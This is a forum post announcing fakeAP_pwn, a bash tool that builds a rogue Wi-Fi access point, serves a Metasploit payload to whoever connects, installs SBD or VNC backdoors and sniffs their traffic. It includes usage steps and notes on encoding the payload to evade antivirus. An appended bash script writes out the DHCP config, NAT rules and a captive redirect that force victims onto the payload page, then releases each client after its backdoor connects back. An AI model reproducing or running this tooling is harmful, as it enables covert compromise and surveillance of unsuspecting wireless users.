Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

  #1 g0tmi1k (Moderator, joined Feb 2010)

    [Script][Video] fakeAP_pwn (v0.2.5)

    ~ V0.3 FINAL IS OUT ~
    [Script] [Video] fakeAP_pwn (v0.3)

    What is this?

    An update to the script, fakeAP_pwn. This is a bash script to automate creating a 'Fake Access Point' and 'pwn' whoever connects to it! The FakeAP is transparent (allowing the target to afterwards surf the inter-webs once they have been exploited!), and the payload is either SBD (Secure BackDoor - similar to netcat!) or VNC (remote desktop).

    How does this work?
    > Creates a fake AP and DHCP server.
    > Runs a web server & creates an exploit with Metasploit.
    > Waits for the target to connect, download and run the exploit.
    > Once successfully exploited, it grants access to allow the target to surf the inter-webs.
    > Uploads a backdoor (SBD or VNC) via the exploit.
    > The attacker has the option to run a few 'sniffing' programs (from the dsniff suite) to watch what the target does on the FakeAP!

    What do I need?

    > Two interfaces: one for Internet (wired/wireless) and the other for becoming an access point (wireless only - must support monitor mode)
    > An Internet connection (though you could modify it so it's non-transparent)
    > Airmon-ng, dhcpd3, apache, metasploit, dsniff suite --- all on BackTrack!
    > The script! fakeAP_pwn-v0.2.5.tar.gz (490.3 KB, SHA1:541d91c19ff32777317385218820233a62f1dc76)

    Whats in the tar.gz?
    > --- Bash script
    > www/index.php --- The page the target is forced to see before they have access to the Internet.
    > www/Linux.jpg, OSX.jpg, Windows.jpg --- OS pictures
    > www/sbd.exe --- SBD Backdoor
    > www/vnc-g0tmi1k.exe --- VNC Backdoor

    How to use it?
    1.) Extract the tar.gz file (via tar zxf fakeAP_pwn-v0.2.5.tar.gz).
    2.) Copy the "www" folder to /var/www (cp www/* /var/www/)
    3.) Make sure to "Start Network" and to have an IP address. (via start-network and dhclient [Internet Interface])
    4.) Edit with your "internet" and "wireless" interface. (You can view your interfaces via ifconfig and use kate to edit the file.)
    5.) bash (don't forget to be in the correct folder!)
    6.) Wait for a connection...
    7.) ...Game Over.

    tar zxf fakeAP_pwn-v0.2.5.tar.gz
    cd fakeAP_pwn-v0.2.5
    cd fakeAP_pwn
    cp www/* /var/www


    • This time it should work for everyone, just not me =P
    • The video uses v0.2.1
    • It's worth doing this "manually" (without the script) before using the script, so you have an idea of what's happening, and why. The script is only meant to save time.
    • I'm running BackTrack 4 Final in a VM. The target is running Windows 7 Ultimate (fully up-to-date 2010-05-13), with no firewall, no AV and no UAC. Tested with Windows XP SP3 Professional as well.
    • The connection is reversed - so the connection comes from the target to the attacker, therefore, as the attacker is the server, it could help out with firewalls...
    • As you can see in the code, one day I plan for this to also "affect" Linux and/or OSX... but it's taken me this long to update it - so don't hold your breath!

    Song: Medicin - Summer Drummer
    Video length: 3:20
    Capture length: 8:12

    > Removed silly typos

    + Added arguments
    + Checks for superuser
    + Checks interfaces/paths/files exists
    + Improved transparent mode (Thanks joker5bb)
    > General code improvements
    > Updated the help message

    + Fakes the MAC address (Thanks joker5bb)
    + Fix “wicd” bug (Thanks joker5bb)
    + Randomizes ports each time
    + Reversed VNC - No need to type in password now
    + Stops and removes existing backdoors
    + Stops services and programs (Thanks joker5bb)
    + Uses “msfencode” - to prevent detection
    + Webpage now has a "favicon"
    > Fix a few minor features - Couple of silly typos (Thanks joker5bb)
    > General code improvements
    > Improved "clean up" code
    > Improved the WiFi interface (Thanks joker5bb)
    > Renamed the backdoor files
    > Renamed the output windows

    + Fix gateway bug
    + Fix DHCP PID Bug
    + Checks for other index files. And acts on it.
    + Checks to make sure user copied www/. Else acts on it.
    + Added more tools to "extra".
    + Added extra settings (Response to all requests & WiFiName)
    > Improved debug info
    > Aligned the output windows
    > General code improvements
    > Improved chances of DHCP working (Might need more work)
    > "Started" work on transparent (Needs more work)
    > "Started" work on allowing a custom backdoor (Needs more work)
    - Removed Linux/OSX - was confusing people

    + Remade first release
    > Created Video

    + First public release
    Last edited by g0tmi1k; 03-05-2011 at 02:17 PM.
    Have you...g0tmi1k?
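The "How does this work?" list and the usage steps above describe one procedure: hand the victim an address, funnel its HTTP to the local web server until it runs the payload, then let that client out to the real Internet. The script below is an added example written for this page, not fakeAP_pwn's own code. It generates the dhcpd config and the iptables rules for that flow as reviewable text, and only applies them when FAKEAP_APPLY=1 is set. The interface names (at0 for the airbase-ng tap, eth0 upstream), the 10.0.0.0/24 subnet and the web port are assumptions; change them to match your ifconfig output.

```bash
#!/usr/bin/env bash
# Added example (not fakeAP_pwn's own code): build what a transparent fake AP
# needs besides the AP itself: a dhcpd config for the victims' subnet,
# NAT/forwarding rules, a captive redirect that sends every HTTP request to
# the local web server, and a per-client rule that lifts the redirect once
# that client has run the payload. Names below are assumptions.

AP_IF="${AP_IF:-at0}"        # tap interface airbase-ng creates for the fake AP (assumed)
NET_IF="${NET_IF:-eth0}"     # upstream interface with Internet access (assumed)
SUBNET="${SUBNET:-10.0.0}"   # first three octets of the /24 handed to victims (assumed)
GW="${SUBNET}.1"             # address the attacker puts on AP_IF
WEB_PORT="${WEB_PORT:-80}"   # port the local web server (index.php) listens on

# dhcpd config: short leases so clients re-request quickly; gateway and DNS
# both point at the attacker so every flow crosses the AP box.
gen_dhcpd_conf() {
  cat <<EOF
default-lease-time 60;
max-lease-time 72;
authoritative;
subnet ${SUBNET}.0 netmask 255.255.255.0 {
  range ${SUBNET}.100 ${SUBNET}.254;
  option routers ${GW};
  option domain-name-servers ${GW};
}
EOF
}

# Rules that make the AP transparent: masquerade out of NET_IF and forward
# both ways (return traffic only for flows the victim opened).
gen_forward_rules() {
  cat <<EOF
iptables -t nat -A POSTROUTING -o ${NET_IF} -j MASQUERADE
iptables -A FORWARD -i ${AP_IF} -o ${NET_IF} -j ACCEPT
iptables -A FORWARD -i ${NET_IF} -o ${AP_IF} -m state --state ESTABLISHED,RELATED -j ACCEPT
EOF
}

# Captive rule: every TCP/80 request arriving on AP_IF is DNATed to the local
# web server, so the victim sees index.php whatever site it asked for.
gen_captive_rule() {
  echo "iptables -t nat -A PREROUTING -i ${AP_IF} -p tcp --dport 80 -j DNAT --to-destination ${GW}:${WEB_PORT}"
}

# Release rule: inserted at position 1 of nat/PREROUTING so it beats the DNAT
# above; only the named client is let out. Refuses addresses outside the
# victim subnet so a typo cannot open the redirect for something else.
gen_release_rule() {
  local client="$1"
  case "$client" in
    ${SUBNET}.*) ;;
    *) echo "refusing to release ${client}: not in ${SUBNET}.0/24" >&2; return 1 ;;
  esac
  echo "iptables -t nat -I PREROUTING 1 -i ${AP_IF} -s ${client} -j ACCEPT"
}

# Apply everything (root, and airbase-ng already running on AP_IF). The
# generators above have no side effects, so the rules can be read first.
if [ "${FAKEAP_APPLY:-0}" = "1" ]; then
  set -e
  ifconfig "${AP_IF}" "${GW}" netmask 255.255.255.0 up
  gen_dhcpd_conf > /tmp/fakeap-dhcpd.conf
  dhcpd3 -cf /tmp/fakeap-dhcpd.conf "${AP_IF}"
  echo 1 > /proc/sys/net/ipv4/ip_forward
  gen_forward_rules | sh
  gen_captive_rule | sh
fi
```

Once a client's backdoor has connected back, run `gen_release_rule 10.0.0.105 | sh` (with that client's lease address) to lift the redirect for it alone; every other client on the AP keeps landing on index.php. Keeping generation separate from application is deliberate: the rule text can be diffed against what `iptables -t nat -L -n` shows, and the clean-up step of the script only has to flush what was generated.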
